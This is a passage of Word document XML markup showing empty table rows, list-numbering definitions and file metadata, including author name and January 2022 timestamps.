          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E664AD7" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2551EF87" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3693" w14:paraId="31913293" w14:textId="77777777" w:rsidTr="00FA3693">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="759A5854" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D3B935D" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3693" w14:paraId="25A05400" w14:textId="77777777" w:rsidTr="00FA3693">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A4DF870" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C409BA9" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3693" w14:paraId="3DBE4BE3" w14:textId="77777777" w:rsidTr="00FA3693">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12C340EB" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="679E44B2" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA3693" w14:paraId="6A14D729" w14:textId="77777777" w:rsidTr="00FA3693">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48721A88" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C70AFCB" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ACB24CA" w14:textId="77777777" w:rsidR="00FA3693" w:rsidRDefault="00FA3693" w:rsidP="00C36402"/>
    <w:sectPr w:rsidR="00FA3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61F4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D946E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07A92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00BA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FE25D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24CE5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2"/>
    <w:rsid w:val="0019187C"/>
    <w:rsid w:val="00674F09"/>
    <w:rsid w:val="00C36402"/>
    <w:rsid w:val="00FA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D169"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D80429F0-7D30-4EBB-89FA-DB280EAC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18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91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18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Brinkley</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nick Brinkley</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-21T00:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-21T00:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>